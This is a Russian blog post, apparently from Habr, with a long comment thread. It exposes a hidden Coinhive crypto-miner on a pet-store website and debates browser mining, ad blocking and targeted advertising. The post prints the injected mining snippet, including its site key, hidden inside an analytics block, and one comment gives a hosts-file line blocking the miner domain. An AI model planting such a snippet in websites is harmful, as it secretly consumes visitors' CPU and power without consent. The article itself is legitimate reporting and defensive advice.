Скрытый JS-майнинг криптовалюты на сайте: альтернатива рекламе или новая чума

    image
    Буквально недавно промелькнула новость про Pirate Bay, который начал тестировать криптомайнер на JavaScript как альтернативу традиционной рекламной модели. Теперь же, судя по всему, нас ждет волна интеграции подобных скриптов в каждый мелкий магазинчик по продаже швейных принадлежностей. Только сегодня наткнулся на аналогичный скрипт, встроенный в код сайта zveruga.net — небольшой сети по продаже товаров для животных.


    Зоомагазин и скрипты


    Сегодня позвонил отец и сообщил, что у него Kaspersky Total Security ругается на скрипт для майнинга на сайте зоомагазина. И даже успел безуспешно поругаться по этому поводу с девушкой на первой линии поддержки. С предсказуемым результатом "Эээээ… Чего? Скрипты?". Решил ради интереса проверить — вдруг ложная эвристика сработала. Оказалось, что вполне корректно сработало — в коде главной страницы http://www.zveruga.net/ нашлась странная вставка:


    <!-- Yandex.Metrika counter -->
    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
    <script>
        var miner = new CoinHive.Anonymous('PW7FI1VfOmLOORjnVtJqS62MdJTJFiOl');
        miner.start();
    </script>
    <script type="text/javascript">
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter24517820 = new Ya.Metrika({id:24517820,
                        webvisor:true,
                        clickmap:true,
                        trackLinks:true,
                        accurateTrackBounce:true});
            } catch(e) { }
        });
    
        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";
    
        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks");
    </script>
    <noscript><div><img src="//mc.yandex.ru/watch/24517820" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
    <!-- /Yandex.Metrika counter -->

    Кусок скрипта, активирующий майнинг оказался встроенным в блок Яндекс.Метрики. При активированном ghostery активности не проявлял, но стоило его временно отключить, как все ядра процессора немедленно нагружались расчетами. Молодцы ребята из Mozilla. Теперь многопоточность!)




    Зачем они жрут мои ресурсы?


    Сам по себе подобный майнинг крайне малоэффективен. Плюс требует наличия открытой вкладки со скриптом, что делает осмысленным интеграцию только на туда, где пользователь проводит действительно много времени. Pornhub не подойдет, да. Потому есть несколько вариантов:


    1. Сайт кривой — у них даже HTTPS нет на странице авторизации! Взломали китайские боты и напихали скриптов куда попало.
    2. Реально решили заработать. Почему бы и не добавить каплю доходов в дополнение к рекламе.
    3. Админу не хватило на пиво.

    В целом, мне кажется очень странным подобный способ получения прибыли. Сжирание процессора на 100% — это очень-очень грязный ход. Все же о таком следует предупреждать пользователя, который не ожидает такой подлости от браузера. В Kubuntu Linux тормоза интерфейса не ощущаются, видимо, из-за корректной приоритезации, а в Windows 7 система ощутимо начинает тупить. Немного страшно представить себе ситуацию, когда каждая вкладка начнет поедать системные ресурсы, пытаясь убить всех остальных.


    Adblock для майнеров


    В целом, вся эта фигня похожа на смесь очередной волны malware и поиска альтернативной модели заработка. Уже много клавиатур растоптано в сетевых баталиях на тему этичности блокировки рекламы. Вечная проблема столкновения интересов двух сторон — пользователь хочет качественный контент, создатель контента и сервиса хочет окупить свои затраты и немного заработать. И еще рекламные сети сбоку пристроились. С распространением блокировщиков рекламы ситуация становится все напряженнее. Кто-то уходит совсем, кто-то начинает показывать жалобных голодных котиков или переходить на модель платной подписки. Большинство тупо превращаются в сгенерированную копирайтерами за еду скриптами помойку с заголовками в духе Роспотребнадзор обвинил селфи в распространении вшей.


    Возможность выкинуть на мороз рекламщиков крайне заманчиво выглядит для тех ресурсов, которых традиционно гнобят официальные власти — торрент-трекеров, продавцов неправильного укропа и тому подобных. Но и для обычных посещаемых ресурсов это может стать интересной альтернативой рекламной модели. Основные проблемы заключается в нескольких моментах:


    1. Деньги капают мизерными крохами с каждого пользователя.
    2. Вкладка со скриптом и браузер должны быть открыты максимально длительное время, что в принципе не очень характерно для современного варианта прыжков со страницы на страницу.
    3. Конкуренция за CPU между отдельными онлайн-сервисами. Процессор не резиновый, а каждый норовит выкрутить майнинг на полную мощность, чтобы успеть урвать хоть что-то за короткое время.

    Во все это безобразие уже включились антивирусы. С одной стороны, они вроде как на стороне огромной массы полуграмотных пользователей. С другой — что-то очень дофига они стали себе позволять в плане того, что может делать пользователь, а что нет, прорастая во все возможные часть операционной системы.


    Кажется, нас ждет интересное ближайшее будущее. Ждем ответ от браузеров, блокирующих исполнение кода на неактивных вкладках. И еще очередного слоя блокировщиков. Единичные пользователи с радикальным NoScript вероятно опять пропустят все веселье.

    В чем проблема с описанным сайтом?

    Только зарегистрированные пользователи могут участвовать в опросе. Войдите, пожалуйста.

    Поделиться публикацией
    Реклама помогает поддерживать и развивать наши сервисы

    Подробнее
    Реклама
    Комментарии 197
    • 0
      Стоило упомянуть, что есть блокировщики для этого безобразия AntiMiner
      • +15
        Стандартный uBlock с дефолтыми подписками уже блокирует, еще одно расширение, пожирающее память, не нужно.
        • +2
          Конечно, если стоит uBlock, то не нужно. Но не все люди пользуются блокировщиками рекламы (порой по идейным соображениям).
          • +19

            Мне жаль таких людей...

            • +7
              Почему же? Редко пользуюсь расширениями в принципе, а блокировщик никогда не было мысли ставить. Не испытываю никакого дискомфорта от рекламы. Кроме того, очень даже полезно иногда в яндекс почте увидеть рекламу о какой-то вещи которую я гуглил некоторое время назад. Если меня что-то интересует и мне это предлагают в рекламе — это очень здорово.
              • +3
                > Если меня что-то интересует и мне это предлагают в рекламе — это очень здорово.

                А вот когда меня что-то интересует — я это либо покупаю, либо планирую купить. Иначе это выглядит как манипуляция, мне не приятно. Для меня это как вклинивание в мою приватную жизнь. Я бы лучше смотрел на абсолютно рандомную рекламу.
                • +4
                  Какой смысл в рандомной рекламе? Это выглядит неразумно, учитывая, что есть развитая таргетинговая. И что значит манипуляция? Понятное дело, что если хочешь иди купи, но у нас уже не тот мир где на рынке у какой-то вещи может быть всего один или два производителя. Полезно знать, что там еще предлагают.

                  Я могу понять почему это может не нравится кому-то, раз существуют адблоки, могу понять когда кому-то нужна анонимность вокруг которой столько шума. Я не могу понять когда кто-то поддерживая откровенно попсовое мнение пишет, что ему жаль тех, кто такое же мнение не поддерживает.
                  • +6

                    Когда мне что-то нужно, я это гуглю и покупаю, часто в тот же день. А потом ещё пару месяцев смотрю уже нерелевантную рекламу вещи, которую я уже купил. Фигня эта ваша таргетированная реклама, короче.

                    • +1

                      А ещё из-за этого в гугле стало трудно найти что-то новое )))

                    • +1
                      кстати да, рандомная (неперсонализированная) реклама тоже имеет свой смысл. Можно сразу понять, зайдя на сайт:
                      1) кто целевая аудитория сайта
                      2) на что тратят в основном деньги пользователи сайта
                      3) что вообще сейчас пытаются пользователям интернета впаривать
                      то есть, чисто из любопытства, это интересно. Персонализированная реклама убивает такую возможность. Она лишь дает мне понять, что обо мне думают RTB боты, но не дает доп инфы об окружающем мире.
                      И самое обидное, что даже отключив персонализацию, получаешь не глобальную картину, а некий срез самой дешевой рекламы за клик, которую суют неперсонализированным пользователям (и распределение будет радикально отличаться от модели, когда персонализации нет в принципе).
                      • 0
                        Позвольте прояснить.
                        Вот я искал кофемолку и кофеварку. Вот я их купил. Вот прошло уже больше полугода, а Skype до сих пор мне предлагает купить еще одну. Такую же. Это в надежде, что старая сломалась? Или таргетинг кривой?
                        И так почти везде. Зашел не как аноним посмотреть новую АКБ к авто — будешь еще месяца 2 видеть крики на пол-листа — " У НАС ДЕШЕВЛЕ!!!"
                        Вы уверены, что именно в этом смысл рекламы?
                        • +1
                          Не знаю, как в Skype, а вот в Яндекс.Директе можно скрыть конкретный баннер с комментарием «уже купил». И тогда он больше не будет показывать ничего подобного, зато будет предлагать связанные товары (скажем, деткие игрушки после подгузников или зимнюю резину после автомобиля).
                          • –1
                            Может алгоритмы не могут вам предложить что-то лучше, вы не палили свои интересы и т.п.
                          • 0
                            Во-первых, сети собирают информацию и после этого знают что и почему мне нравится. Эта такая себе биография о вас, только значительно детальней. Мне это не по нраву: я хочу чтобы моя жизнь была моей приватной.

                            Эсли я хочу посмотреть что там делают разные производители — я захожу на специализированные сайты и читаю об этом. В чем же проблема?

                            > И что значит манипуляция?

                            Примером вы хотите диван, но как-то решили, что потом, так как может вам он и не нужен. Но интернет теперь думает иначе — и диваны теперь везде и вы думаете о диване постоянно — и потом его покупаете. Понимая лучше человека, его привычки и слабые стороны, сетям удается больше продавать.
                        • 0

                          Очень полезно заходить на сайты и среди тонны рекламы искать нужную информацию? Может вам еще нравится музыка на сайтах?

                          • +5
                            В моем списке сайтов нет ни одного, где есть тонна рекламы и какая-либо музыка которая запускается без моего согласия.
                          • +2
                            Сейчас в тренде автоплей видевы (привет ленте.ру), а не музыки.
                            • +1
                              Например, я тоже не использую блокировщики рекламы, а когда открываю незнакомый для меня сайт, это позволяет видеть сайт «как есть» и сразу покинуть его, если вижу что «всё плохо» (на таких сайтах я никогда не задерживаюсь и по возможности никогда не возвращаюсь). Таким образом, я наказываю плохие сайты и поддерживаю хорошие (поисковая система учитывают моё поведение, и чаще всего в топе вижу сайты с «нормальной рекламой»). Если бы большинство пользователей поступили бы так же, интернет был бы чище, и вебмастерам не было бы выгодно использовать назойливую рекламу.

                              Быть может, звучит бредово, но мне кажется, в какой-то мере данный тип рекламы всё ещё существует именно по вине тех пользователей, которые «надели розовые очки» дабы не видеть грязь. Но самая большая проблема в том, что такие пользователи задерживаются на «грязный ресурс» и это подсказывает поисковым системам якобы о хорошем сайте, которого нельзя исключить из результатов поиска.
                              • 0
                                Особенно если рассмотреть трекер, который контентом наполняют пользователи, а вырвиглазную рекламу ставят совершенно другие люди.
                                • 0
                                  Ну, в принципе если вы заходите на сайт с блокировщиками он вас не видит и не учитывает, а если учитывает то как некого анонима по которому очень мало статистически значимых данных учет по которым проводится скорей как ботов чем реальных пользователей. И ведь сайт ничего не имеет с вашего захода, а значит реклама для вас «не работает», а работает она только для того кто заходит БЕЗ блокировщика — именно они и дают статистику сайту, от них зависит работа сайта. А раз кто-то заходит, значит и сайт востребован…
                                  • 0
                                    Когда посетитель переходит на сайт из результатов поиска и сразу возвращается к выдаче чтобы перейти на следующий сайт, это говорит поисковой системе, что посетителю не понравился увиденный сайт. Даже если используется блокировщик, не думаю что Google или Yandex не могут отслеживать такое поведение.

                                    Что касается постоянных посетителей или прямых заходов — люди не должны задерживаться на «грязные» сайты, а перейти на «чистый» сайт конкурента. Но чтобы отличить «грязные» сайты от «чистых», нужно увидеть всё «как есть» (то есть не использовать блокировщикии). При таком подходе, мы наказываем «грязные» сайты (понижаем позицию в результатах поиска, не задерживаемся, не приносим доход) и поддерживаем «чистые» сайты (повышаем позицию в результатах поиска, увеличиваем длительность сеанса, понижаем показатель отказов, приносим копеечный доход даже если не кликаем по рекламе).

                                    Я более чем уверен, что в «реальной жизни» большинство людей поступают также. Например, они не возвращаются в кафе, где грязно, хамят клиентам или адски шумно. Они не надевают очки или наушники, чтобы скрыть всё это, а посещают другие, уютные кафе, где оставляют даже чаевые. Чем же хороший вебмастер отличается от хорошего официанта, и почему бы не «поддерживать» хороший сайт, если хотим избавиться от «грязи»… К тому же, почему так мало людей задумываются о том, что блокировщики рекламы рано или поздно заставят «хорошего» вебмастера бросить сайт или искать грязные методы монетизации, когда «плохой» вебмастер просто будет переключиться на альтернативные методы обмана…
                                    • 0
                                      Когда посетитель переходит на сайт из результатов поиска и сразу возвращается к выдаче чтобы перейти на следующий сайт

                                      А как поисковая система может это обнаружить? Вот, получил я, значит поисковую выдачу, и давай средней кнопкой по ссылкам кликать. Какие-то вкладки не понравились — сразу закрываю, какие-то — заинтересовали, я их почитал, какие-то в это врямя висят открытые, потому что я до них ещё не добрался. Поисковую выдачу я всё это время не трогаю.

                                      • +1
                                        Да, поисковая система не сможет определить, какая именно из нескольких открытых подряд ссылок вас заинтересовала. С другой стороны, поисковая система может определить, что ни одна из открытых ссылок не понравилась, например, вы продолжили открывать ссылки через короткий промежуток времени. Ну а дальше будет просто накопление статистики на миллионах таких людей, как вы, и её последующий анализ.
                                        • +1
                                          Переход по ссылке с поисковой выдачи учитывается, а дальше работают трекеры от гугла на самом сайте, это конечно если ничего не блочить и т.п. и они МОГУТ сопоставить сам переход с поисковой выдачи, время нахождения на сайте и какие странички открывал. Всё это делается по большей части через кукисы. И если их выключить — возможностей по отслеживанию поведения пользователя у поисковика станет гораздо меньше, менее надёжное связывание посетителя с конкретным пользователем хотя косвенными методами они ещё могут отследить перемещение анонима по сайту который находится под их наблюдением и отличить от действий других посетителей — например по TTL, UserAgent, разрешению экрана, ширине активного окна браузера, геолокации, IP-адресу и множеству косвенных признаков которые вполне складываются довольно уникально для каждого пользователя. Чтобы полностью себя анонимизировать перед поисковиками нужно приложить довольно серьёзные усилия — засесть в компьютерном классе с 20-ю клонированными машинами подключенными к одному роутеру и на каждой из них осуществлять почти одинаковое взаимодействие с поисковиком — сёрфить одновременно на одном и том же сайте.
                                          • 0
                                            К словам DistortNeo и Alexeyslav хочу добавить, что ещё одним сигналом служит случаи, когда пользователи вводят уточняющие запросы. Например, сначала ввели «слон» открыли первые результаты, не нравилось то, что нашли и ввели «розовый слон» — очень высока вероятность, что первые места в выдаче будут занимать сайты, которые были просмотрены ранее, но если посетитель больше не посещает их, значит «что-то не так».

                                            К тому же, далеко не все пользователи открывают несколько вкладок. Что самое странное (по крайне мере для меня), что некоторые люди даже не открывают ссылки в новом окне (по умолчанию в Google опция «Открывать результаты в новом окне» отключена).
                                          • +1
                                            Так вы и так грязному сайту не приносите дохода. Суть такова, что в отличие от физического мира, мы МОЖЕМ изменить место куда ходим — для нас грязное кафе будет выглядеть вполне чистым и приносить удовольствие. А если нечто крякает и выглядит как утка… в этом прелесть виртуального пространства по сравнению с физическим.
                                            Вот те люди кто зашли на сайт без блокировщиков и им не понравилась грязь — вот они во второй раз туда не придут, или придут уже с блокировщиком. А те кто регулярно ходят на грязный сайт и их это не смущает — они собственно и оплачивают работу сайта и участвуют в статистике которую мы видим. И судя по тому что такие сайты всё ещё существуют — таких людей достаточно много!
                                            • 0
                                              Так моя идея состоит в том, что нужно поддерживать хорошие сайты. Прелесть виртуального пространства ещё состоит в том, что можно потратить пару секунд/минут, чтобы найти хороший сайт. То, что пользователи «надели розовые очки», лишь скрыло проблему, но не решило её. Сейчас Вам удобно так, но что будет, когда все пользователи будут использовать блокировщики? Ведь, в отличие от хороших вебмастеров, плохие вебмастеры никуда не исчезнут, они лишь будут использовать другие способы обмана или будут заставить посетителя отключить блокировщик.

                                              Что касается тех, кто регулярно ходят на грязные сайты — не знаю, почему они этого делают, но как уже отметил выше, я знаю, откуда и «благодаря кому» на такие сайты попадают новые посетители.
                                    • 0
                                      От рекламы в яндекс почте блокировщики не помогают. Во всяком случае, не adBlock+
                                      • 0
                                        А покупаете прям с того баннера или всё же гуглите ещё?
                                      • +2
                                        Я не пользуюсь ресурсами, где реклама слишком навязчива, вот и всё. А пользоваться блокировщиком рекламы на ресурсах, которые тебе нравятся и ты им не донатишь не то что бы хорошая идея.
                                      • 0
                                        Попробовал поставить uBlock — на этом сайте как было 100% загрузки, так и остается. Не помогает он тут.
                                        • 0
                                          а добавить нужное в фильтры?
                                          • +1
                                            Не надо там ничего добавлять. Уже все добавлено из коробки.
                                      • 0
                                        uBlock больше рассчитан на блокировку рекламы и по готовым «спискам». Этого мало. Ведь можно обойти его, превращая ситуацию в вечные бои. Но можно решить вопрос на корню. Блокировать все левые скрипты, которые не отразятся на работе сайтов. Даже не только скрипты, но и запросы на другие домены и т.д. Здесь помогут такие инструменты как: RequestPolicy Continued, uMatrix и другие.
                                        • +1
                                          Не совсем так. Там есть (похожая на uMatrix) система базовых настроек, которая позволяет глобально порезать 3-rd party объекты. Вот, к примеру, эта страница:
                                          image
                                          У юблока даже в описании заявлено, что это больше, чем просто списочный блокер рекламы. :)
                                          • 0
                                            Может быть я и не совсем прав. Но использую связку с несколькими расширениями. Если пробьют одно, заблокирует другое :)
                                            • 0
                                              Имкнно так и надо. :)
                                              Но и с точки зрения «поставил и забыл» — юблок тоже хорош сам по себе. Если что-то вдруг понадобится обуздать, то в нем почти все нужное для этого есть.
                                              • 0
                                                встречал рекламу украинского интернет-магазина Розетка, которая пробивает стек из нескольких блокировщиков (и ручная блокировка AdBlock Plus работала до нажатия F5). Подозреваю, что на каждый запрос генерируется уникальная рандомная разметка. Тревожный звоночек.

                                                Хотя… на подходе motherboard.vice.com/en_us/article/9a4yny/princetons-ad-blocking-superweapon-may-put-an-end-to-the-ad-blocking-arms-race
                                                • 0
                                                  наблюдал такое пару недель на сайтах gismeteo.ua, sinoptik.ua с теми же симптомами. Сейчас уже все хорошо.
                                                  • 0
                                                    Пробивать блокировщики не имеет смысла. Достаточно сделать одну подлость — рекламу не отличимую от контента. Это сейчас её относительно просто выделить и формализовать правило блокировки, а теперь представьте что и реклама и контент будут идти от одного CDN и иметь очень мало формализуемых признаков по которым их можно отличить… отключаешь рекламу — отключаешь и полезный контент.
                                                    • –1
                                                      А зачем мне контент неотличимый от рекламы?
                                                      • 0
                                                        Неотличимый для блокировщиков, например использующий один общий CDN так что только по домену рекламу от контента уже не отличишь и попытка простым способом убить рекламу убивает и полезный контент. Сейчас считай почти халява — большую часть рекламы можно срезать с минимальными затратами просто анализируя домен по спискам.
                                                      • 0
                                                        Это будет сделать довольно сложно. Насколько я помню, делать рекламу, неотличимую от контента, запрещено законодательно в некоторых странах.
                                                        • 0
                                                          Неотличимую для блокировщиков — на уровне ссылок на ресурсы с контентом. Например, баннеры могут располагаться в том же пространстве что и полезный контент с точки зрения браузера, но располагаться и выглядеть для человека как реклама — это чисто технический вопрос внутреннего устройства сайта, куда законодательство ещё не проникло.
                                                          В конце-концов, каждое изображение и/или объект сайта будь-то статья или картинка или реклама могут запрашиваться с сервера по длинному хешу и поди определи по запросу что это рекламный баннер или полезный документ. И списки блокировки резко станут неэффективными чуть более чем полностью.
                                                        • 0
                                                          Уверен, что к этому придут, к сожалению. Да, это куча неудобств, но сделав сервис, технически похожий на Cloudflare, которому будут доверять и рекламодатели и вебмастера, можно заворачивать весь траффик, и по ходу переколбашивать разметку, гомогенизируя контент.

                                                          А вот когда появится супероружие по ссылке, то придется, конечно, напрячься рекламщикам, и проявлять креатив.

                                                          PS: лично я даже поставил бы галочку в блокировщиках «готов майнить, нагружая 20% процессора», если бы она была. Мне мое личное время дороже процессорного времени. Без хоть какого-то win-win победа блокировщиков призовет пейволы, и проиграют все.

                                                          PPS: Хотя… против пейволов можно создать р2р сеть, которая будет кешировать контент, и после первого просмотра страницы участником сети, оплатившим пейвол, давать доступ всем…
                                                          • 0
                                                            Хотя… против пейволов можно создать р2р сеть, которая будет кешировать контент
                                                            И тогда будут ватермарки добавлять в контент и автоматом банить аккаунты, с которых он утекает.
                                              • 0
                                                Ещё в копилку фильтров для ABP и подобных (uBlock в т.ч.): github.com/hoshsadiq/adblock-nocoin-list
                                              • 0
                                                так и сейчас ничего не мешает пихать скрипты майнеров в списки адблоков.
                                                • 0
                                                  Всё же стоит разделять блокировку майнеров, рекламы и трекеров.
                                                  К сожалению, все больше рекламы обходит adblock. Это наводить на мысль, что блокировать надо на уровне межсетевого экрана. Благо, список js майнеров есть в открытом доступе
                                                  • 0
                                                    а зачем, если они блокируются одним и тем же образом?
                                                • 0
                                                  Поставить RequestPolicy Continued или аналоги(был уже упомянут Ghostery), запастись попкорном и наблюдать шоу :)
                                                  • 0
                                                    Ghostery вообще не для этого, а RequestPolicy ломает 90% сайтов. Настраивать под каждый — ну его нафиг.
                                                    • 0
                                                      Не под каждый. Можно разблокировать нужные скрипты глобально. И они будут работать на каждом сайте, где используются. Один раз настроить и будет работать.
                                                      • 0
                                                        Более вероятная причина поломки, что статика (картинки и CSS) грузится с другого домена. Но обычно всё чинится в 2 клика.
                                                        • 0
                                                          И так ан каждый новый посещаемый сайт… а если мне туда только на один раз? Приходится по нескольку раз перезагружать сайт прежде чем полностью настроить разрешения для него — каждый раз подгружаются новые объекты которые не грузились из-за блокировок на предыдущем этапе. И не факт что это всё — в любой момент может заблокироваться что-то новое а ты даже не узнаешь что часть контента на сайте тупо не отображается. А теперь представить что используется несколько блокировщиков и многие действия по разблокировке надо будет производить в каждом из них…
                                                          • 0
                                                            Да, с новыми сайтами могут быть некоторые неудобства. Зато если там какой-то майнер, вирус или ещё что-то — очень спасает.
                                                            • 0
                                                              а если мне туда только на один раз?
                                                              Схватить трояна можно и за «один раз». Обычно, когда кликаешь на заражённый сайт, просходит несколько редиректов на странные домены, либо эксплойты подгружаются не напрямую, а тоже с других доменов.

                                                              Да, неудобно лишний раз кликать в подтверждение каждого редиректа или каждой подгрузки с другого домена, но гигиена того стоит.
                                                        • 0
                                                          два-три F5 и сайты оживают. хотя я на uMatrix свалил, и у меня по умолчанию сторонние скрипты просто вырублены нафиг. единственный реальный геморрой — это рекапча, которая ходит по тем же доменам что и гугломусор.
                                                      • 0
                                                        А как защититься-то от подобного чуда, дабы не вляпаться ненароком?
                                                        • 0
                                                          Использовать блокировщики рекламы или скриптов.
                                                          • 0
                                                            Установить и настроить расширения RequestPolicy Continued, uMatrix и аналоги.

                                                            P.S.: Не обязательно ставить все. Достаточно будет выбрать какое-то одно и настроить его.
                                                            У меня нормально получилось подружиться с RequestPolicy Continued. С uMatrix, так и не смог заставить habr нормально выглядеть и пару других сайтов.
                                                            • 0
                                                              В hosts вписать:
                                                              0.0.0.0 coin-hive.com
                                                          • 0
                                                            А скрипт можно как то настроить на потребление ресурсов? Например если бы он сжирал не 100, а 20 процентов проца, то никто бы и значения не придал. Не обязательно что бы пользователь проводил много времени на сайте, у меня например много открытых вкладок отложенных на потом. Ну и что касается малой эффективности, думаю расчет на количество пользователей.
                                                            • 0
                                                              Судя по демке на главной странице проекта, можно задать количество потоков.
                                                              Хотя в документации дополнительно указано, что можно задать время бездействия для этих потоков

                                                              coin-hive documentation
                                                              • 0
                                                                В конструктор можно передать параметр throttle у которого значение от 0 до 1, указывает сколько ресурсов оставить пользователю. На реддите также «попросили» не майнить на ноутбуках которые не заряжаются www.reddit.com/r/Monero/comments/71okng/some_advice_for_all_you_guys_using_coinhive
                                                                • 0
                                                                  Процессор всегда работает на 100%. Но можно работать, например, 200 мс и потом 800 мс спать, тогда будет нагрузка 20%. Но это снижает доход в 5 раз. Тут вопрос — сколько пользователей замечают, что что-то идёт не так. Мне почему-то кажется, что выгодней выжимать все соки, в большинстве своём пользователи неграмотные и не поймут, что что-то не так.
                                                                  • +1

                                                                    Что бы понять, что стало слишком уж сильно тормозить (и надо попросить кого-то помочь), грамотность не нужна.

                                                                    • 0
                                                                      Ну вот я открывал сайт этого зоомагазина, оставил в фоне, в диспетчере задач, конечно, вижу нагрузку на все 4 ядра, но в целом я этого не ощущаю, как работал, так и работаю. В типичной нагрузке бутылочное горлышко это ввод-вывод, а не процессор, поэтому загрузка процессора совершенно не факт, что будет заметна. Ну вентиляторы включились через полминуты, но они и так бывает включаются, совсем не показатель.
                                                                      • 0
                                                                        Это проблема, если ноут в пыли и перегревается. Плюс аккумулятор меньше держит. Вот тут выжимание всех соков будет заметным. Если как у вас — просто вентилятор чуть пошумел, то вы правы, не заметят.
                                                                    • 0
                                                                      У процессора еще частота плавает. А вместе с частотой — потребление энергии, тепловыделение и шум.
                                                                  • 0
                                                                    Похоже, что этот скрипт вставляется не только на сайтах но и в расширениях к браузеру. Один из пользователей моего сайта жаловался на то, что у него Касперский ругается на этот скрипт. Ему помогло полное сканирование.
                                                                    • 0
                                                                      Ну если судить по сайту сервиса, то они планируют изменить этот скрипт, чтобы однозначно спрашивать разрешения на включение (opt-in) у юзеров.
                                                                      (пардон за дубль комментария, хотя и статья по сути тоже дубль :) )
                                                                      Как по мне, это гораздо лучше баннеров даже сейчас (исключая смарты с их дохлыми аккумуляторами, разве что). Потому что доход идет напрямую владельцу сайта, поставившего майнер вместо рекламы или капчи, а не левым рекламщикам, которые, к тому же, трекингом занимаются. А этот майнер почти ничего не отслеживает, судя по его описанию.
                                                                      Само собой, это все не оправдывает тех сайтоводов, которые втихую такое могут крутить и не прописывать в условиях.
                                                                      • +2
                                                                        Как обычно будет пара нормальных скриптов и сотни пожирателей. В итоге резать будут все, чтобы машина не повисла от нагрузки.
                                                                        • 0
                                                                          Угу. В том же описании, кстати, есть упоминание использования хтмл5 хранилища для связи с другими вкладками, так что и тут уже проработали. :)
                                                                          Будет жаль, если их внесут в черные списки, станет только хуже — куча самописных поделок без разделения ресурсов.
                                                                          • 0
                                                                            Будет «отлично», если разработчики данного ммм… «решения» освоят Service Workers (с учетом возможности создания не отключающихся со временем воркеров)
                                                                        • +2
                                                                          Можно подумать, что-то мешает майнить и ставить рекламу одновременно.
                                                                        • 0
                                                                          Вы бы лучше рассказали что делать тем, кто решил таким образом реально заменить рекламу, а вместо принудительного баннера, скажем, поставил кнопку, включающую майнер, если юзер желает помочь сайту. Это ведь вполне легитимный сценарий использования, только вот негласное добавление таких скриптов в списки антивирусов всю идею убивает на корню. И более того, благодаря такому скрипту легко в какие-нибудь чёрные списки поисковиков загреметь.
                                                                          • 0
                                                                            Ну вот вроде и хороший посыл, но надо же ограничтьва ресурсы, ну ёпрст!

                                                                            Я тоже считал, что можно заработать с этого майнера, при этом не вредя пользователям.
                                                                            Есть у меня маленький сайтец с 800 униками в день. Они генерят около 6-7 тыс. просмотров и проводят на сайте… ну не пять минут, но и не часы.

                                                                            Так вот за месяц при ограничении нагрузки от майнера до 5% на таком сайте можно заработать аж 150 руб. за месяц :) Больше — вред пользователям, да и прибыль увелчится довольно слабо.

                                                                            Есть второй сайт, который еще в разработке. Там предоставление услуг, тарифы 75/175/275 руб. в месяц. Проработал идею «намайните себе на тариф» и понял, что либо человеку прийдется майнить месяц, либо мне это не выгодно. Но кто будет гонять месяц свой компьютер ради 75 руб.?

                                                                            Итого, таким способом можно действительно заработать только на очень посещаемом ресурсе, на котором пользователи проводят очень много времени. Но, как правило такой ресурс (если он легальный) предоставляет какие-то услуги или продает адекватную рекламу и зарабатывает больше.
                                                                            • +1
                                                                              Меня пугает, что это начало появляться уже в случайных мелких сайтах. Следующий этап — будут вместо amigo в каждый инсталлятор совать.
                                                                              • 0
                                                                                Так уже была волна вставлять майнеры в раздачи игр на торрентах.
                                                                                Что логично, т.к. у геймеров хорошие видеокарты.
                                                                                • 0
                                                                                  Эта волна уже вроде бы прошла, или я больше на неё не попадаюсь
                                                                                • 0
                                                                                  про «75 рублей» альтернатива давно известна: вывешивание адреса для доната под каждой статьей. Бесспорно бывалый Пряников утверждает, что в нынешней России это нифига не работает, но не менее упорный Бабченко до сих пор такую подпись использует.
                                                                                  Все нужно пробовать самому: давно и на многих сайтах есть фича «Заметили ошибку в тексте? Выделите ее и нажмите Ctrl+Enter в своем браузере». Однако по поводу нередких опечаток в статьях на Хабре такая фича не используется до сих пор — «ну, значит, есть на то веские причины!..» (с)
                                                                                  • 0
                                                                                    а Хабре такая фича не используется до сих пор
                                                                                    Очевидно же. Кому понравится, если твою статью отредактирует администрация. А если перенаправлять оповещения автору (и автор уже давно забил на Хабр), у пользователей будет непонятка: как так, я отправил, а никто не исправляет.
                                                                                    • 0
                                                                                      я до сих пор не знаю, что лучше: позориться опечатками или рисковать, что местные безымянные модеры наворочают искажение глубокого смысла долго вынашиваемой статьи. Лишние школоло-запятые, несогласованные падежи и пр. — все это можно разрешить для замечаний(!) в строго ограниченном интервале времени, как и комменты для RO-лишенцев вроде меня. Т.е., в первые дни после публикации автор, забивший на статью — так ли он ценен для Денискина? А ведь есть еще «редакторы», которых Денискин оценивает конкретно в реальных деньгах: у них тоже бывают опечатки.
                                                                                      Но Денискину виднее — тут нет даже предмета для спора.
                                                                                      • 0
                                                                                        А причем тут администрация?
                                                                                        Такой скрипт должен через бэкэнд направлять оповещение автору статьи (личным сообщением). А уж что там — решит автор исправить или не решит…
                                                                                        • 0
                                                                                          Я об этом написал отдельно. Это может быть плохой UX. Т.к. функция активна, то юзер считает, что его сообщение будет доставлено и прочитано, что есть какой-то человек, который ежедневно это просматривает. А если никто не отреагировал, то негатив куда? — создателям сайта.
                                                                                  • 0
                                                                                    Уж лучше майнить, чем обогревать планету впустую за счет «тяжелого» флеша от уникального коллектива дизайнеров моргающей рекламы. Да, флэш умирает и прореживается, но и «тяжелым» он бывал не у всех и не всегда.
                                                                                    • +7
                                                                                      ИМХО, с глобальной точки зрения майнить — худшее, как можно потратить энергию. Выхлоп с этого мероприятия будет околонулевым, зато энергии сожрётся уйма. Тем более они делают это на CPU. Лучше бы условным Folding'ом занимались — хоть какая (глобальная) польза для планеты.
                                                                                      • –2
                                                                                        не ИМХО: с глобальной точки зрения про биткоин до сих пор нет ответа на вопрос «кому выгодно?». Даже его создателя до сих пор не приперли к стенке деанона, хотя про то, что «их оставалось только трое», было уже несколько публикаций здесь же.
                                                                                        Т.е., имхо тут все точно так же, как и с монетизацией Телеграм: пока нет ответа на правомерный вопрос «откуда [будут] деньги, Зин?», доверять безоглядно таким проектам — просто глупо. А теперь еще и Розенберг разворошил гнездо, а до того Перекопский тоже много интересного наговорил.
                                                                                        • 0
                                                                                          > Тем более они делают это на CPU
                                                                                          Некоторые виды криптовалют эффективно майнятся только на CPU.
                                                                                          • 0
                                                                                            Это уже больше на лотерею начинает походить. Или на МММ.
                                                                                            • 0
                                                                                              только на CPU
                                                                                              Например? Тот же Monero (XMR), который задумывался как CPU-валюта, сейчас научились майнить на GPU с несколько раз более высоким хешрейтом, чем на CPU.
                                                                                          • –1
